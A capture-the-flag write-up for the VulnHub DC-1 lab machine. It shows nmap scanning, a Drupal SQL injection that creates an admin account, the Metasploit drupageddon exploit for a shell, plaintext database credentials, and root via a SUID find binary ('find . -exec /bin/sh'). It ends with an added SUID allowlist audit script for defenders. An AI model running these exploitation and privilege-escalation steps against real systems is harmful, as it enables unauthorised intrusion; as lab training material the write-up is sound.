VulnHub – DC-1


Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 GNU/Linux
NMap 7.70
Metasploit 5.0.13

I started as usual with a ping sweep of my network to find the IP address of the machine in question: nmap -sn 10.0.2.*

Afterwards I ran a port scan using nmap -A

Port 80 looks like our foothold here; it appears to be a Drupal 7 based website.
Navigating to the webpage confirms this.

searchsploit drupal shows several interesting entries, including an SQL injection script to create an admin user and a Metasploit module for remote code execution.

Let’s start with the SQL injection to create an admin account on the website.
The command python /usr/share/exploitdb/exploits/php/webapps/ -t -u driggzzzz -p Pwn3d will create an account with the username driggzzzz and the password Pwn3d.

This will come in handy later.

Drupal 7 has a well-known CVE, drupageddon, so I launch Metasploit to attempt to take advantage of this.
The commands are use exploit/multi/http/drupal_drupageddon followed by set RHOSTS

Running this will create a meterpreter shell.

I use the shell command to create a system shell on the target machine, followed by whoami to determine which user I'm logged in as, and the Python one-liner python -c 'import pty; pty.spawn("/bin/bash")' to upgrade to a bash shell.

Browsing the current directory finds us the first of 5 flags on this machine.

cat flag1.txt provides a hint on the next flag.

I'll come back to this very shortly; first let's look for other files called flag*
find -iname flag* shows this.

cat flag4.txt

Interestingly, I've managed to skip 2 flags, so I'll have to take a look at the config files mentioned in the first flag.

Heading back to /var/www and having a look around, I eventually stumbled upon a settings.php file. Reading its contents reveals the 2nd flag and what appears to be a set of SQL database login credentials.

I have already used an SQL injection script to create an admin account on the website, but let’s have a look anyway.

mysql --database=drupaldb --user=dbuser --pass=R0ck3t

show tables;

select * from users; confirms that the account I created earlier is there. I also attempted to crack the hashes for admin and Fred whilst I was here, but this was taking way too long so I eventually let that go.

This seemed like a good time to check out what was happening on the website, especially since flag 3 is still missing.

Logging on with the credentials I created earlier and navigating to content brings us to the flag.

Ok, this clearly sets us up nicely for some privilege escalation back in the shell that we have.

find / -perm -u=s -type f 2>/dev/null will find anything with the SUID bit set; whatever we find here, I'm hoping, will help with getting root.

The find binary actually has the SUID bit set. Knowing that find can execute programs through -exec, I tried find . -exec /bin/sh \; which simply matches the current directory and executes a shell, inheriting root privileges from the SUID binary.

id confirms we have root privileges. Navigating to the root directory will find us thefinalflag.txt
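The root cause of the escalation above is a SUID bit on a binary that can run arbitrary programs. The following is an added example (not part of the original write-up) of how a defender would catch that on a host: it enumerates SUID files with the same find predicate used above, compares them against an allowlist, and strips the bit from anything unexpected. The allowlist contents and the sample paths are constructed for this example and should be replaced with your own baseline.

```shell
#!/bin/sh
# Added example: audit SUID binaries against an allowlist so that an odd
# entry such as /usr/bin/find stands out. Not code from the original write-up.

# Constructed allowlist of SUID binaries normally expected on a Debian-style
# host. Tune this to the baseline of your own image.
SUID_ALLOWLIST="/bin/su
/bin/mount
/bin/umount
/usr/bin/passwd
/usr/bin/sudo"

# unexpected_suid: read one path per line on stdin and print every path that
# is not in the allowlist. Exact, whole-line, fixed-string matching is used so
# that /usr/bin/sudoedit does not silently pass as /usr/bin/sudo.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# live_suid_scan: enumerate SUID regular files on the running host (the same
# predicate the write-up uses) and report the unexpected ones.
live_suid_scan() {
    find / -perm -u=s -type f 2>/dev/null | unexpected_suid
}

# remove_suid: mitigation for a flagged binary. Strips the SUID bit; needs root.
remove_suid() {
    chmod u-s -- "$1"
}

# sample_scan: the check run over constructed input, where a SUID
# /usr/bin/find (as on this box) is the only entry outside the allowlist.
sample_scan() {
    printf '%s\n' /bin/su /usr/bin/passwd /usr/bin/find /usr/bin/sudo | unexpected_suid
}
```

On a real host, run live_suid_scan from a cron job or a configuration-management check and alert on non-empty output; a freshly built image should produce nothing, so any line it prints is either a package you forgot to baseline or a change worth investigating.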
